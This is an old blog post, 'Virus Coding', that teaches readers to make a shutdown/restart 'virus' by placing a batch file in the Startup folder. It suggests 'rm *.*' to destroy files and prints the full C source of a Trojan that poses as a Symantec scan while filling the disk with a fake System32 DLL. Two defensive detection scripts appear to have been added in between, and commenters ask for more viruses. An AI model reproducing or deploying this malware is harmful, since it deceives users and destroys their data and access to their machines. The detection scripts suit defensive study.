Tuesday, December 29, 2009

Virus Coding



shutdown/ restart virus

By Abir Atarthy

Today I will show you how to create a shutdown/restart virus for both Windows and Linux. This is very simple and you do not need any programming knowledge for it.

This post is not intended to create havoc and is just for educational purposes.




First we will create the windows version.

Let's see how it works. Just close all windows. Now go to the command prompt (Start >>> "Run", now type "cmd"). You have now entered the MS-DOS/command prompt. Here you need to type "shutdown -s" or "restart -s". This will shut down or restart your computer. We are making use of this DOS command to create this virus.

  • Just open a notepad

  • In that type "shutdown -s" or "restart -s".

  • Now save it as virus.bat

  • Now put this file into start up folder

  • Now this program will load every time the computer starts.
  • Now when you run it your system gets turned off.


The only way out for the victim is to boot into safe mode and delete the file from the Startup folder. So go ahead and try them out.

Now the linux version.

In Linux we will create a shell script with the text "poweroff". Now go to the folder where the script is located and right click on it. Change the permission to allow all. Job done.
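From the defender's side, both versions above leave a script in an autostart location that calls a power command, and that is easy to check for. The following is an added example, not part of the original post: the extension list, the command list and the folder locations (the Windows Startup folders and ~/.config/autostart on Linux) are assumptions chosen for this check.

```python
import os
import re
from pathlib import Path

SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".ps1", ".sh", ".desktop"}
# Commands named in the post plus close relatives (assumed list, extend as needed).
POWER_CMD = re.compile(r"(?i)\b(shutdown|restart|poweroff|reboot|halt)(?:\.exe)?\b")
COMMENT = re.compile(r"(?i)^(rem\b|::|#|')")
MAX_BYTES = 1_000_000  # autostart scripts are small; skip anything larger

def default_autostart_dirs():
    """Per-user and all-users Startup folders on Windows, XDG autostart on Linux."""
    tail = Path("Microsoft/Windows/Start Menu/Programs/Startup")
    dirs = [Path(os.environ[v]) / tail for v in ("APPDATA", "PROGRAMDATA") if v in os.environ]
    dirs.append(Path.home() / ".config" / "autostart")
    return [d for d in dirs if d.is_dir()]

def scan_autostart(dirs):
    """Return (file name, line number, command) for each power command found."""
    findings = []
    for d in dirs:
        for p in sorted(Path(d).iterdir()):
            if not p.is_file() or p.suffix.lower() not in SCRIPT_EXTS:
                continue
            if p.stat().st_size > MAX_BYTES:
                continue
            text = p.read_text(errors="replace")
            for n, line in enumerate(text.splitlines(), 1):
                s = line.strip()
                if COMMENT.match(s):  # skip rem / :: / # / ' comment lines
                    continue
                m = POWER_CMD.search(s)
                if m:
                    findings.append((p.name, n, m.group(1).lower()))
    return findings

if __name__ == "__main__":
    for name, n, cmd in scan_autostart(default_autostart_dirs()):
        print(f"{name}:{n}: runs '{cmd}' at logon")
```

A hit is a triage lead, not a verdict: legitimate kiosk or maintenance scripts can also call these commands.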

So Have fun guys and do leave your feedbacks!


simple Linux virus.

system("poweroff");

This simple script will turn off your victim's computer. The above Linux virus can be made extremely dangerous by making a simple change. If you can make your code do its job whenever a person turns on his computer, then think what will happen (I mean other than you going to jail): the person will have to format his system.

Now let's step it up. Let's increase the venom of our snake.

system("rm *.*");

This will erase/delete all files with any extension, provided the logged-in user has permission to delete them. Just imagine: if the admin runs it, it will create havoc.

Now let's come back to Windows. What if you change the extension of a file? It becomes useless. Now let's rename a few files.
rename(old_file_name_with_path, newname);
What you can do with this is left up to you. Just use your brain and you will make out its potential.

These are very simple viruses but can cause havoc.

---------


Make your own Trojan Horse

By Abir Atarthy

What is Trojan Horse?

In simple words, a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or cause damage to the computer.

I am going to tell you about a Trojan horse which presents itself as an antivirus program that scans the computer and removes threats. In reality it does nothing but occupy the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space is very high. As a result the disk gets filled up to 100% within minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension it is often ignored by disk cleanup software. So for the victim, there is no way to recover the hard disk space short of reformatting his drive.

Here is the logic of the Trojan program:-

1. Search for the root drive

2. Navigate to Windows\System32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full

5. Once the drive is full, stop the process.

How to compile, test and remove the damage?

Compilation:

You can use Borland C++ compiler (or equivalent) to compile the Trojan.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%\system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
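The junk file is easy to tell apart from a real library even when its name is not known in advance: a genuine .dll is a PE image (an "MZ" header whose e_lfanew field at offset 0x3C points to a "PE\0\0" signature), while this file is plain repeated text. The following is an added example, not part of the original post; the function names and the min_size parameter are assumptions made here.

```python
import struct
import sys
from pathlib import Path

def is_pe(path):
    """True if the file starts with an MZ header that leads to a PE signature."""
    with open(path, "rb") as f:
        head = f.read(64)
        if len(head) < 64 or head[:2] != b"MZ":
            return False
        (e_lfanew,) = struct.unpack_from("<I", head, 0x3C)
        f.seek(e_lfanew)  # seeking past end of file is harmless: read() returns b""
        return f.read(4) == b"PE\0\0"

def find_fake_dlls(directory, min_size=0):
    """Return (name, size) of .dll files that are not PE images, largest first."""
    hits = []
    for p in Path(directory).iterdir():
        if p.suffix.lower() != ".dll":
            continue
        try:
            if not p.is_file():
                continue
            size = p.stat().st_size
            if size >= min_size and not is_pe(p):
                hits.append((p.name, size))
        except OSError:
            continue  # locked or unreadable file: skip rather than abort the sweep
    hits.sort(key=lambda h: h[1], reverse=True)
    return hits

if __name__ == "__main__":
    # Usage: python find_fake_dlls.py <directory>, e.g. the System32 folder
    for name, size in find_fake_dlls(sys.argv[1]):
        print(f"{size:>15,d}  {name}")
```

Sorting by size puts a disk-filling file at the top of the output, which also answers the question of where the free space went.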

Here is the full source code of the program:-

Note:- This is totally intended for educational purpose only. I am no way responsible if you end up corrupting your system. Read the DISCLAIMER section of this site before you proceed.

#include "stdio.h"

#include "conio.h"

#include "dos.h"

#include "stdlib.h"

FILE *a,*t,*b;

int r,status,vir_count;

double i;

char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);

void findroot(void);

void showstatus(void);

void draw(void);

void accept(void);

void main()

{

draw();

accept();

textcolor(WHITE);

draw();

gotoxy(12,8);

cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");

sleep(3);

gotoxy(12,8);

delline();

cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");

getch();

gotoxy(12,8);

delline();

findroot();

}

void accept()

{

textcolor(LIGHTRED);

gotoxy(1,8);

cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)

exit(0);

}

void draw()

{

clrscr();

textcolor(WHITE);

gotoxy(12,2);

cputs("********************************************************");

gotoxy(12,6);

cputs("********************************************************");

gotoxy(12,3);

cputs("*\n\b*\n\b*\n\b");

gotoxy(67,3);

cputs("*\n\b*\n\b*\n\b");

gotoxy(14,4);

cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");

}

void findroot()

{

t=fopen("C:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

textcolor(WHITE);

a=fopen("C:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

t=fopen("D:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

a=fopen("D:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

t=fopen("E:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

a=fopen("E:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

t=fopen("F:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

a=fopen("F:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

if(t==NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");

getch();

exit(1);

}

exit(1);

}

void eatspace()

{

textcolor(LIGHTRED);

gotoxy(12,16);

cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");

textcolor(WHITE);

gotoxy(12,18);

while(1)

{

for(r=1;r<4;r++)

{

for(i=1;i<900000;i++)

{

status=fputs(ch,b);

if(status==EOF)

{

textcolor(WHITE);

vir_count=random(120);

draw();

gotoxy(12,8);

cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);

gotoxy(12,10);

cprintf("PRESS ANY KEY TO CLOSE...");

getch();

break;

}

}

cputs(".");

if(status==EOF) break;

}

if(status==EOF) break;

}

exit(0);

}

void showstatus()

{

gotoxy(12,8);

cputs("SCANNING THE SYSTEM FOR THREATS");

gotoxy(12,10);

cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");

gotoxy(12,13);

cputs("SCAN IN PROGRESS. PLEASE WAIT...");

}



2 comments:

  1. Amazing content. The virus is working. Thanks Mr. Abir. pls give more such virus.

  2. Wonderful !!!!!!!!!!
    Keep posting such codes
